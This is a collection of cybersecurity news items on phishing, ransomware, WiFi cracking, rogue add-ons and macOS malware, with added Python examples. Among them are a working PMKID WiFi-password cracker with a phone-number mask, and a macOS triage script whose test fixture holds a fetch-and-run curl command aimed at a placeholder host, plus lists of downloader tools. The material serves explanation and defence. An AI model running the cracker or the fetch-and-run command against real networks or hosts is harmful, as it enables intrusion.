Users Warned About the Steam Scam Prevailing in the Wild


A new online scam is circulating that can cost PC gamers access to their Steam accounts, and may also leave their systems infected with malware.

Valve's Steam is a digital distribution service for video games. It was released as a standalone software client in September 2003 so that Valve could push automatic updates for its own games, and was later expanded to carry titles from third-party publishers.

Anyone who has played a multiplayer online game is probably familiar with skins: cosmetic overlays for in-game items that are widely traded and can be bought for either virtual or real money.

Malwarebytes has issued a warning about a skins scam that can cost users their accounts and their entire game libraries. According to a recent Malwarebytes Labs blog post, one of the longest-running variants is skin phishing, in which a scammer sets up a fake marketplace, a replica of a genuine game-themed community site, or even a fake copy of a user's trade inventory page in order to harvest account credentials.

What makes the scheme dangerous is how quickly it plays out. The scammer starts by sending potential victims a message containing a malicious link over Steam or Discord. The messages look like this:

“Yo, I don’t know you, unfortunately, but this is for you, I do not need that knife [link]” 

“I haven’t met you, unfortunately (or not lol), but take it, I don’t need that skin [link]”

Once a Steam account has been taken over, the victim has to go through Steam Support to try to recover it, but by then the scammer has usually changed the password and the other login details. Worse, because many people reuse passwords, the attacker may try the stolen Steam credentials against the victim's other online accounts.

Malwarebytes recommends that Steam users enable two-factor authentication (Steam Guard) on their accounts and avoid clicking links from strangers, whether in-game or elsewhere, to protect themselves against this and similar scams.
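The scam hinges on a link that looks like a Steam trade page but is not. As an added example (my own code, not from Malwarebytes or Valve), the following Python check shows the traps a link can hide: a fake host that merely begins with steamcommunity.com, the user@host trick, punycode labels and typosquats. The host list and the distance threshold are assumptions for illustration, not Valve's complete set of hostnames.

```python
from urllib.parse import urlsplit

# Hosts Valve uses for Steam Community and the Steam store. Assumption: this list is
# illustrative, not Valve's complete set of legitimate hostnames.
LEGIT_STEAM_HOSTS = ("steamcommunity.com", "steampowered.com")
BRAND_LABELS = ("steamcommunity", "steampowered")


def is_legit_steam_link(url: str) -> bool:
    """True only if the link's host is a known Steam host or a subdomain of one.

    urlsplit() yields the real host, so 'https://steamcommunity.com@evil.tld/'
    resolves to evil.tld, and 'steamcommunity.com.evil.tld' is not a subdomain
    of steamcommunity.com (it ends with '.evil.tld').
    """
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower().rstrip(".")
    if parts.scheme not in ("http", "https") or not host:
        return False
    return any(host == h or host.endswith("." + h) for h in LEGIT_STEAM_HOSTS)


def _levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch typosquats such as 'steamcomunity'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reasons(url: str) -> list:
    """Why a non-Steam link looks like Steam phishing. Heuristic signals, not proof."""
    if is_legit_steam_link(url):
        return []
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    reasons = []
    if parts.username is not None:
        # Everything before '@' is userinfo; the browser connects to `host`.
        reasons.append(f"user@host trick: real host is {host}")
    labels = host.split(".")
    if any(lbl.startswith("xn--") for lbl in labels):
        reasons.append("punycode label (possible homoglyph domain)")
    for lbl in labels:
        for brand in BRAND_LABELS:
            d = _levenshtein(lbl, brand)
            if d == 0:
                reasons.append(f"'{brand}' used as a label inside another domain ({host})")
            elif d <= 2:  # assumption: distance <= 2 is close enough to call a typosquat
                reasons.append(f"typosquat of '{brand}': '{lbl}'")
    if not reasons and "steam" in host:
        reasons.append("mentions steam but is not a Valve host")
    return reasons


if __name__ == "__main__":
    for link in ("https://steamcommunity.com/tradeoffer/new/?partner=12345",
                 "https://steamcommunity.com.evil.invalid/tradeoffer",
                 "https://steamcommunity.com@evil.invalid/login",
                 "https://steamcomunity.com/login"):
        print(link, "->", "ok" if is_legit_steam_link(link) else lookalike_reasons(link))
```

The same logic applies to Discord invite links and to any other service a scam impersonates: parse the URL, compare the real host against a short allow-list, and treat anything else as untrusted regardless of how familiar it looks.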

Apple Fixes Critical iOS Flaws; One Under Attack


Among the fixes is one serious flaw that researchers have shown can be exploited from the browser, making it suitable for watering-hole attacks.

On October 25 and 26, Apple released iOS 14.8.1, iPadOS 14.8.1, watchOS 8.1 and tvOS 15.1, fixing 24 CVEs in total. The CVEs are listed on Apple's security updates page and cover a range of bugs in iOS components that, if exploited, can lead to arbitrary code execution, in some cases with kernel privileges, which would let an attacker reach the core of the operating system.

For one of them, a memory-corruption bug in IOMobileFrameBuffer (CVE-2021-30883) listed in the Apple TV advisory, Apple said it is "aware of a report that this issue may have been actively exploited", a "may" that researchers have since substantiated.

This one is particularly worrying because researchers had already shown the bug is exploitable from the browser, making it "ideal for one-click & waterholing mobile attacks", as mobile security firm ZecOps put it earlier this month.

In a watering-hole attack, the threat actor plants malware on websites its intended targets are likely to visit and waits for someone to drop by and get infected. Apple, reasonably, withholds details that would help other attackers build exploits; what it does say is that the flaw may allow an application to execute arbitrary code with kernel privileges.

Earlier this year Apple said it would give users a choice: update to iOS 15 as soon as it was available, or stay on iOS 14 and keep receiving important security updates until they were ready to upgrade.

As for the reason behind that decision, there has been speculation that it was a response to the "urban myth" that Apple deliberately slows down older phones to push customers into upgrading.

It may be a popular conspiracy theory, but it has some basis in legal comeuppance, at least where battery life is concerned: in 2017, Apple admitted to throttling phones to stop devices with worn batteries from shutting down unexpectedly. In November of last year, the company agreed to pay $113 million to settle a multistate investigation into what became known as iPhone "batterygate".

70% of WiFi Networks in Tel Aviv were Cracked by a Researcher


In his home city of Tel Aviv, a researcher cracked 70% of a sample of 5,000 WiFi networks, showing how weak and easy to hijack residential networks are. Ido Hoorvitch, a security researcher at CyberArk, first walked around the city centre with WiFi sniffing gear to collect 5,000 network hashes for the study.

He then relied on a technique that extracts the PMKID, a value the access point includes in the first EAPOL frame for PMK caching and fast roaming, so it can be obtained without any client being connected. Hoorvitch sniffed with Wireshark on Ubuntu and used a $50 network card capable of monitor mode and packet injection to collect the PMKID hashes.

Although Hoorvitch stressed that this kind of attack does not require heavy hardware, the team used a "monster" cracking rig of eight QUADRO RTX 8000 (48GB) GPUs in CyberArk Labs. The attack builds on a technique discovered by Hashcat's lead developer, Jens 'atom' Steube, which allows PMKID hashes to be obtained from an access point and the network password recovered from them.

"Atom’s technique is clientless, making the need to capture a user’s login in real-time and the need for users to connect to the network at all obsolete," explains Hoorvitch in the report. "Furthermore, it only requires the attacker to capture a single frame and eliminate wrong passwords and malformed frames that are disturbing the cracking process." 

Cracking then happens offline: for each candidate passphrase, the PMK is derived from the passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 iterations), a PMKID is computed from that PMK and the MAC addresses of the access point and client, and the result is compared with the PMKID captured by a sniffer in monitor mode. A match means the candidate is the network's WiFi password. Hoorvitch captured PMKID hashes with the hcxdumptool utility, converted them with hcxtools into a format hashcat understands, and ran hashcat, a password recovery tool, against them.

According to Hoorvitch, many Tel Aviv residents use their mobile phone number as their WiFi password, so it did not take long to crack hashes, recover passwords and open the door to the networks. Restricted to that pattern, each crack took around nine minutes on the researcher's laptop. In all, the team broke into more than 3,500 WiFi networks in and around Tel Aviv.
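To make the offline step concrete, here is the PMKID derivation and a dictionary attack over a phone-number mask in pure Python. This is an added example written for this page, not CyberArk's or hashcat's code; the PBKDF2 and HMAC constructions are the ones WPA/WPA2-Personal defines, and the line format is hashcat's mode 22000 (the format hcxpcapngtool from hcxtools emits). The SSID, MAC addresses and password below are constructed sample data.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Encode a captured PMKID as a hashcat mode-22000 line (type 01 = PMKID, no EAPOL fields)."""
    return "WPA*01*{}*{}*{}*{}***".format(pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def parse_22000_line(line: str):
    """Inverse of build_22000_line: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***"""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID (type 01) hashcat 22000 line")
    pmkid, ap_mac, sta_mac, essid = (bytes.fromhex(f) for f in fields[2:6])
    return pmkid, ap_mac, sta_mac, essid.decode()


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline attack: derive PMK -> PMKID for each guess and compare with the capture."""
    pmkid, ap_mac, sta_mac, ssid = parse_22000_line(line)
    for password in candidates:
        if hmac.compare_digest(derive_pmkid(derive_pmk(password, ssid), ap_mac, sta_mac), pmkid):
            return password
    return None


def phone_number_candidates(prefix: str = "054", digits: int = 7, start: int = 0, stop: Optional[int] = None):
    """Enumerate 'mobile number' passphrases: prefix followed by `digits` zero-padded digits.

    One prefix is only 10**digits guesses, which is why this keyspace falls so fast.
    """
    stop = 10 ** digits if stop is None else stop
    for n in range(start, stop):
        yield f"{prefix}{n:0{digits}d}"


# Constructed sample: a network whose password is a phone number, as in the report.
SAMPLE_SSID = "HomeNet-5G"
SAMPLE_AP_MAC = bytes.fromhex("00a1b2c3d4e5")
SAMPLE_STA_MAC = bytes.fromhex("0011223344ab")
SAMPLE_PASSWORD = "0541234567"
SAMPLE_LINE = build_22000_line(
    derive_pmkid(derive_pmk(SAMPLE_PASSWORD, SAMPLE_SSID), SAMPLE_AP_MAC, SAMPLE_STA_MAC),
    SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_SSID)


def demo() -> Optional[str]:
    # A narrow slice of the mask keeps the demo quick; a real run enumerates the whole prefix.
    return crack_pmkid(SAMPLE_LINE, phone_number_candidates("054", start=1234500, stop=1234600))


if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", demo())
```

The mask is exactly why the phone-number habit is fatal: with a handful of mobile prefixes the keyspace is tens of millions of guesses, and because the attack is clientless the only cost is the PBKDF2 work, which a GPU rig performs hundreds of thousands of times per second. A random passphrase of the length the report recommends puts the same computation out of reach.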

Despite the risk, most consumers do not set a strong password on their WiFi network, the report notes. Passwords should be at least ten characters long, mix lower and upper case letters, symbols and digits, and be unique. Keeping router firmware up to date also protects the hardware against attacks that exploit known vulnerabilities, the researcher adds, and weak encryption protocols such as WEP and WPA1 (TKIP) should be disabled.

Cybersecurity expert assessed the risks of QR code theft

Stealing the QR code that confirms vaccination against coronavirus is theoretically possible, cybersecurity specialist Sergey Vakulin said on October 26.

According to the expert, hackers can reach the QR code through remote access to the device on which it is stored, or steal it by photographing or filming it.

To keep the vaccination data from being captured by surveillance or phone cameras, Vakulin recommended not showing the document in public places; then an attacker cannot capture the QR code or the certificate ID.

“Even if only a certificate identifier is obtained, an attacker can generate it himself with the help of a QR code constructor as a redirect to the government services website that stores information about certificates,” the specialist explained.

The expert warned that attackers can not only use the information received, but also sell it.

Roskomnadzor reported that since March 2021, 3,816 Internet resources that sold fake COVID-19 vaccination certificates and generated fake QR codes for attending public events have been removed or blocked.

In addition, Alexander Gintsburg, head of the Gamaleya Center, noted that QR codes will remain an important element in the fight against COVID-19 until the necessary level of herd immunity is achieved.

On October 25, the Ministry of Health approved a modified format for the COVID-19 vaccination certificate: two sheets with a QR code and the patient's personal data, together with information about the vaccination, contraindications and any coronavirus illness.

Recently, Moscow residents were warned about a new type of fraud: scammers call and offer to link the QR code confirming vaccination to a bank or social card, after which money is debited from the account.

UltimaSMS Premium Fraud Campaign Exploits Millions of Android Devices


Avast researchers have uncovered a global premium SMS fraud campaign on the Google Play Store, dubbed UltimaSMS. The scammers used 151 Android apps, downloaded 10.5 million times in more than 80 countries, to trick users into signing up for premium services costing up to $40 (around Rs.3,000) per month depending on carrier and location.

The apps posed as photo editors, spam call blockers, camera filters, games and more, and were promoted through Instagram and TikTok channels. They were downloaded in large numbers in Pakistan, Saudi Arabia, Egypt, the UAE, the USA, Poland and many other countries, particularly in the Middle East. After the fraud was reported, Google removed the malicious apps from the Play Store.

Once installed, an app checks the device's location, International Mobile Equipment Identity (IMEI) and phone number to decide which language to address the user in. When the app is opened it shows a screen asking the user to enter their phone number, and in some cases an email address, supposedly to get access to the advertised product or service.

Avast named the campaign "UltimaSMS" because one of the first apps the researchers found, in May 2021, was called Ultima Keyboard 3D Pro.

“Upon entering the requested details, the user is subscribed to premium SMS services that can charge upwards of $40 per month depending on the country and mobile carrier. Instead of unlocking the apps’ advertised features, which users might assume should happen, the apps will either display further SMS subscriptions options or stop working altogether,” reads the blog post published by Avast. “The sole purpose of the fake apps is to deceive users into signing up for premium SMS subscriptions.”

Tips to protect yourself from fraudulent SMS apps 

• Ask your carrier to disable premium SMS services on your line. With that option off, the UltimaSMS scheme cannot charge you.
• Read the reviews before installing an app of this kind; they often reveal what the app really does.
• Do not enter your mobile number into an app unless you trust it.
• Read every prompt shown during installation and grant a permission only after understanding what it is for.

Cyberattack Disrupts Gas Stations Across Iran, Government Says


A software failure suspected to be the result of a cyberattack has disrupted gas stations across Iran and defaced pump displays and fuel-price billboards.

The incident, which occurred on Tuesday, affected the IT network of the National Iranian Oil Products Distribution Company (NIOPDC), the state-owned distributor that controls gas stations throughout Iran. The network, which has supplied oil products for more than 80 years, comprises more than 3,500 stations nationwide.

According to local media reports, as well as photographs and videos posted on social media, the attack caused the screens at NIOPDC gas stations to display the words "cyberattack 64411". The pumps could still have dispensed fuel, but NIOPDC staff shut them down once the company realised it could no longer track and charge customers for the fuel they took.

NIOPDC-operated fuel-price signs in major cities also displayed the same "cyberattack 64411" message, along with "Khamenei, where is the gas?" and "Free gas at [local gas station's name]".

64411 is the phone number of the office of Supreme Leader Ayatollah Ali Khamenei. The same number appeared on billboards at Iranian train stations during a cyberattack on July 9, when passengers were told to phone Iran's leader and ask why their trains were delayed. The July attack on the railways was later linked to Meteor, a data-wiping malware.

Despite the flood of evidence shared on social media, the Ministry of Oil spokesperson dismissed reports of a "cyberattack" in a later official statement and attributed the incident to a software glitch, according to Jahan News. The same outlet later reported that refuelling at the affected stations had resumed.

Government officials also held an emergency meeting in response to the incident, and after a reprimand from the Iranian leadership several Iranian news agencies deleted their reports of a cyberattack.

Malicious Add-Ons Blocked by Mozilla Firefox


The Mozilla Firefox team has blocked add-ons that were abusing the browser's proxy API. The add-ons had been installed by roughly 455,000 users and were preventing their browsers from updating.

Rachel Tublitz and Stuart Colville of Mozilla's add-ons team wrote in a Monday post that they had found the rogue add-ons in early June. The add-ons abused the proxy API, which extensions use to control how Firefox connects to the internet.

Add-ons are pieces of software installed into Firefox (or other programs) to customise the browser: blocking trackers, removing ads, downloading videos from websites, translating pages and so on.

At the other extreme, they can be malicious and install malware, like the 28 Facebook, Vimeo, Instagram and other add-ons for the widely used Google and Microsoft browsers that researchers discovered last year. Those add-ons stole private data, appeared able to trigger further malware downloads, and rewrote links the victims clicked in order to redirect them to phishing sites and ads.

The Firefox team said the problem add-ons found in June, named Bypass and Bypass XM, intercepted and blocked Firefox's own requests, preventing users from downloading updates, fetching updated blocklists and refreshing remotely configured content. Mozilla has blocked the rogue add-ons so that no more users can install them.

According to the post, Mozilla paused approval of add-ons that use the proxy API while it investigated and is now accepting such submissions again. The post also sets out what Firefox add-on developers should provide to speed up review of add-ons that use the API.

Mozilla has also changed how the browser handles critical requests such as update checks. Beginning with Firefox 91.1, if a critical request made through a proxy configuration fails, Firefox falls back to a direct connection.

“Ensuring these requests are completed successfully helps us deliver the latest important updates and protections to our users,” the Firefox developers said. 

To protect users against such add-ons, the team shipped a system add-on called Proxy Failover (ID: proxy-failover@mozilla.com). System add-ons, a mechanism Mozilla uses to ship Firefox extensions, are hidden, cannot be disabled, and can be updated without restarting the browser. According to Mozilla, Proxy Failover is available for both current and older Firefox versions.

Anyone not running the latest version who has not disabled updates should check whether they are affected, Mozilla says. The first step is to try to update Firefox: recent versions carry an updated blocklist that removes the malicious add-ons automatically.
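If the update itself is being blocked, a quick way to see what is installed is to read the profile's extensions.json directly rather than trusting the about:addons page. The script below is an added example (mine, not Mozilla's) that lists every add-on holding the "proxy" permission and confirms that the Proxy Failover system add-on is present. Assumptions: the field names (addons[].id, defaultLocale.name, active, location, userPermissions.permissions) follow the real file's layout, and the sample file plus the "bypass@example.invalid" ID are constructed; Mozilla did not publish the IDs of Bypass and Bypass XM here.

```python
import json

PROXY_FAILOVER_ID = "proxy-failover@mozilla.com"  # the system add-on named in Mozilla's post

# Constructed sample modelled on a Firefox profile's extensions.json (assumed layout).
SAMPLE_EXTENSIONS_JSON = json.dumps({
    "schemaVersion": 35,
    "addons": [
        {"id": "uBlock0@raymondhill.net", "type": "extension", "active": True,
         "location": "app-profile", "defaultLocale": {"name": "uBlock Origin"},
         "userPermissions": {"permissions": ["storage", "tabs", "webRequest"],
                             "origins": ["<all_urls>"]}},
        {"id": "bypass@example.invalid", "type": "extension", "active": True,  # hypothetical ID
         "location": "app-profile", "defaultLocale": {"name": "Bypass"},
         "userPermissions": {"permissions": ["proxy", "storage"], "origins": ["<all_urls>"]}},
        {"id": PROXY_FAILOVER_ID, "type": "extension", "active": True,
         "location": "app-system-defaults", "defaultLocale": {"name": "Proxy Failover"},
         "userPermissions": {"permissions": [], "origins": []}},
    ],
})


def load_addons(extensions_json_text: str) -> list:
    return json.loads(extensions_json_text).get("addons", [])


def addons_using_proxy_api(extensions_json_text: str) -> list:
    """Add-ons holding the 'proxy' permission, i.e. able to reroute or block Firefox's own requests."""
    hits = []
    for addon in load_addons(extensions_json_text):
        perms = (addon.get("userPermissions") or {}).get("permissions") or []
        if "proxy" in perms:
            hits.append({
                "id": addon.get("id"),
                "name": (addon.get("defaultLocale") or {}).get("name"),
                "active": bool(addon.get("active")),
                "location": addon.get("location"),
            })
    return hits


def proxy_failover_present(extensions_json_text: str) -> bool:
    """True if Mozilla's Proxy Failover system add-on is installed and active."""
    return any(a.get("id") == PROXY_FAILOVER_ID and a.get("active")
               for a in load_addons(extensions_json_text))


def report(extensions_json_text: str) -> list:
    """Human-readable findings; each line is one thing to act on."""
    lines = []
    for hit in addons_using_proxy_api(extensions_json_text):
        state = "active" if hit["active"] else "disabled"
        lines.append(f"proxy API: {hit['name']} ({hit['id']}, {state}, {hit['location']})")
    if not proxy_failover_present(extensions_json_text):
        lines.append(f"missing: {PROXY_FAILOVER_ID} (update Firefox)")
    return lines


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXTENSIONS_JSON
    print("\n".join(report(text)) or "nothing to report")
```

Point it at extensions.json in the profile directory (under ~/.mozilla/firefox/ on Linux, ~/Library/Application Support/Firefox/Profiles/ on macOS). A proxy-capable add-on is not malicious by itself, since VPN and privacy extensions legitimately need it, but any you do not recognise should be removed before retrying the update.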

Ransomware Ranzy Locker Infected at Least 30 US Organizations


The FBI said on Monday that the Ranzy Locker ransomware has hit at least 30 US organisations across a range of industries this year. “Unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021. The victims include the construction subsector of the critical manufacturing sector, the academia subsector of the government facilities sector, the information technology sector, and the transportation sector,” reads the flash alert.

The flash alert, issued jointly with CISA, is meant to give security professionals the information they need to detect and prevent ransomware attacks. Most Ranzy Locker victims who reported intrusions told the FBI that the attackers got into their networks by brute-forcing RDP credentials.

Others said the attackers used credentials harvested in phishing campaigns or exploited vulnerable Microsoft Exchange servers.

Like most ransomware gangs, Ranzy Locker operators steal unencrypted files from inside the victim's network before encrypting its systems. The exfiltrated files, which include customer data, personally identifiable information (PII) and financial records, are used as leverage: victims are pressured to pay both to regain access to their files and to keep the data from being leaked online.

In several cases the gang applied this double-extortion model, threatening to leak the stolen data if the ransom was not paid. The flash alert also includes indicators of compromise (IOCs) associated with Ranzy Locker operations and YARA rules to identify the threat.

On visiting the group's Tor payment site, victims see a "Locked by Ranzy Locker" notice and a live chat window for negotiating with the threat actors. The operators also offer to decrypt three files for free as part of this "service", to prove that the decryptor can restore the data.

The alert's recommended mitigations include: keep regular backups of all data as air-gapped, password-protected offline copies; segment the network so that not every machine is reachable from every other machine; install and regularly update antivirus software on all hosts and enable real-time detection; and apply updates and patches to operating systems, software and firmware as soon as they become available.

Microsoft reported thousands of cyberattacks by the Russian hacker group

Microsoft has reported renewed activity by the Nobelium group, which more than a year ago attacked the American software developer SolarWinds and gained access to US government data.

According to Microsoft, the hacker group, allegedly linked to Russian intelligence, has significantly stepped up its activity in recent months: between the beginning of July and mid-October it carried out about 22,900 attacks on 609 organisations.

Russian experts, however, disagree with Microsoft's representatives. Alexey Lukatsky, an information security consultant at Cisco, said that no one has presented evidence that hackers from Russia are behind the Nobelium group.
According to him, if an attack comes from Russian IP addresses and the code fragments have previously been attributed to Russian hackers (often also without evidence), experts conclude that Russians are behind the attack.
“It is now fashionable to accuse Russia of cyber attacks, as some countries allocate large budgets to raising their level of protection against cyber attacks, and some companies believe it is easier to obtain them by fighting a known enemy,” said Lukatsky.

Anastasia Tikhonova, head of the complex threat research team in Group-IB's Threat Intelligence unit, also believes there is no clear evidence that Russian hackers are behind the activity of the Dark Halo (Nobelium) group.
“No tactics, techniques and procedures that could prove overlaps between the actions of Dark Halo (Nobelium) and another well-known group of attackers have been presented, except perhaps a comparison of the Sunburst backdoor used by Dark Halo (Nobelium) with the Kazuar RAT, which is used by hackers of the Turla group,” she added.

Sergey Nenakhov, head of the information security audit department at Infosecurity, agrees with Tikhonova and Lukatsky. According to him, drawing conclusions about a particular group's involvement in an attack requires access to a large volume of telemetry that only a very limited number of companies can collect. Microsoft, as a major player, can afford such an investigation, but it is unclear how independent the company is from political interference, Nenakhov said.

South Korean Telecom Operator Crippled by DDoS Attack


South Korean telecommunications operator KT suffered a nationwide network outage earlier this week that affected its fixed-line and wireless services, including phone calls and internet access.

The suspected distributed denial-of-service (DDoS) attack crippled the network for almost an hour: customers on the telco's network could not reach the internet for around 40 minutes from about 11am on Monday. Access has since been restored for KT users in most of the country.

A team of investigators from the Seoul police cyber department was sent to KT's headquarters in Seongnam, Gyeonggi Province, just south of Seoul. Later in the day KT repeated that the outage appeared to have been caused by a large-scale DDoS attack, adding that it is still looking for the perpetrators and continuing to assess the extent of the damage.

“The telco's network was shut down due to a large-scale DDoS attack. During the outage, the company's crisis management team was working to quickly restore the network back to normal. KT is yet to figure out the extent of the damage or who was behind the DDoS attack,” KT spokesperson stated. 

The Ministry of Science and ICT said it is monitoring the situation closely together with KT. The ministry did not confirm that the outage was caused by a DDoS attack, but it said the other major telcos, SK Telecom and LG Uplus, were not affected.

Even so, SK Telecom and LG Uplus customers complained on social media about outages on those networks. Spokespeople for the two telcos said these were caused by a sudden surge in traffic from KT users switching to their services during KT's outage, and that both companies would keep monitoring the situation closely.

According to Science and ICT Ministry data, about 16.3 million people relied on KT for internet service as of March 2021. KT's previous major outage was in 2018, when a fire at its Ahyeon branch in central Seoul disrupted internet and phone service in nearby areas, including the Jung-gu, Yongsan-gu and Seodaemun-gu districts.

Microsoft Cautions Regarding a new Version of UpdateAgent Aimed at MacOS


Microsoft Security Intelligence researchers have found a new variant of UpdateAgent (also known as WizardUpdate), a trojan that targets Mac devices. The malware, first seen in November 2020, also installs adware on macOS. According to Microsoft, the new variant adds several features that make it much harder to detect and remove, thanks to improved persistence and evasion techniques.

Another dangerous capability is that the malware can use public cloud infrastructure to host and serve additional payloads. Once UpdateAgent is installed, for example, it downloads a second-stage adware known as Adload.

“We recently discovered the latest variant of a Mac malware tracked as UpdateAgent (aka WizardUpdate) with new persistence and evasion tactics, the latest in a series of upgrades over the past year. Given its history, this Trojan will likely continue to grow in sophistication,” Microsoft tweeted.

The malware collects system information and sends it to a command-and-control server. Notably, it bypasses Apple's Gatekeeper by stripping the quarantine attribute (com.apple.quarantine) from the files it downloads, so Gatekeeper never inspects them.

Gatekeeper is a central macOS protection: it blocks apps downloaded from the internet unless they are signed and notarized. UpdateAgent, like the OSX/Dok malware before it, gets around it easily, which makes it a persistent threat.

The attackers also use PlistBuddy to set up persistence, after which the malware deletes the directories, files and other artifacts it created to cover its tracks. PlistBuddy is a built-in macOS tool (/usr/libexec/PlistBuddy) for editing .plist files.

“The malware also leverages existing user permissions to create folders on the affected device. It uses PlistBuddy to create and modify Plists in LaunchAgent/LaunchDaemon for persistence. It then covers its tracks by deleting created folders, files, and other artifacts,” the researchers tweeted.

The new variant also impersonates legitimate software, though Microsoft did not say which. The malware is believed to spread through drive-by downloads.
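Because the persistence lives in LaunchAgent and LaunchDaemon plists, those files are the place to hunt. The Python below is an added example written for this page (not Microsoft's detection logic): it parses a launch item plist and reports the traits that UpdateAgent-style persistence tends to show, such as an inline shell command, a download tool in the arguments, or a binary run from a temporary or hidden path. The sample plists are constructed, the example.invalid URL is a placeholder, and the path and tool lists are tuning assumptions.

```python
import glob
import os
import plistlib
import re

# Locations a user-level process can write to; a launch item executing from here is unusual.
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/python3", "/usr/bin/perl")
DOWNLOADERS = ("curl", "wget", "base64", "openssl", "osascript")

# Constructed samples (assumed shapes, not real UpdateAgent artifacts).
MALICIOUS_PLIST = plistlib.dumps({
    "Label": "com.updateagent.helper",
    "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/u | base64 -d | sh"],
    "RunAtLoad": True, "KeepAlive": True})
TMP_PLIST = plistlib.dumps({
    "Label": "com.example.x", "Program": "/private/tmp/.hidden/agent", "RunAtLoad": True})
BENIGN_PLIST = plistlib.dumps({
    "Label": "org.example.backup",
    "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/Backup", "--daemon"],
    "RunAtLoad": True})


def triage_launch_item(plist_bytes: bytes) -> list:
    """Return the suspicious traits of one LaunchAgent/LaunchDaemon plist (empty list = nothing odd)."""
    item = plistlib.loads(plist_bytes)
    args = item.get("ProgramArguments") or ([item["Program"]] if item.get("Program") else [])
    if not args:
        return ["no Program or ProgramArguments (malformed or decoy)"]
    prog, reasons = args[0], []
    if prog.startswith(USER_WRITABLE):
        reasons.append(f"runs from a temporary or world-writable location: {prog}")
    if any(part.startswith(".") for part in prog.split("/") if part):
        reasons.append(f"hidden path component in {prog}")
    if prog in INTERPRETERS and "-c" in args[1:]:
        reasons.append("inline script passed to an interpreter with -c")
    joined = " ".join(args)
    tools = [t for t in DOWNLOADERS if re.search(rf"\b{t}\b", joined)]
    if tools:
        reasons.append(f"download/decode tools in arguments: {', '.join(tools)}")
    if re.search(r"https?://", joined):
        reasons.append("URL in launch arguments")
    if item.get("RunAtLoad") and item.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive (restarted if killed)")
    return reasons


def scan_launch_dirs(dirs=None) -> dict:
    """Triage every plist in the usual LaunchAgent/LaunchDaemon folders; {path: reasons} for hits."""
    dirs = dirs or [os.path.expanduser("~/Library/LaunchAgents"),
                    "/Library/LaunchAgents", "/Library/LaunchDaemons"]
    findings = {}
    for d in dirs:
        for path in glob.glob(os.path.join(d, "*.plist")):
            try:
                with open(path, "rb") as fh:
                    reasons = triage_launch_item(fh.read())
            except Exception as exc:  # unreadable or not a plist: worth a look too
                reasons = [f"could not parse: {exc}"]
            if reasons:
                findings[path] = reasons
    return findings


if __name__ == "__main__":
    for name, data in (("malicious", MALICIOUS_PLIST), ("tmp", TMP_PLIST), ("benign", BENIGN_PLIST)):
        print(name, "->", triage_launch_item(data) or "clean")
    for path, reasons in scan_launch_dirs().items():
        print(path, "->", reasons)
```

Run it on the host as the affected user; items in /System/Library are Apple's own and are deliberately left out. For anything flagged, check the target binary with `xattr -l` (a downloaded file with no com.apple.quarantine attribute is exactly the Gatekeeper bypass described above) and with `codesign -dv`, and remove the plist with `launchctl bootout` before deleting the binary, or the KeepAlive entry will keep resurrecting it.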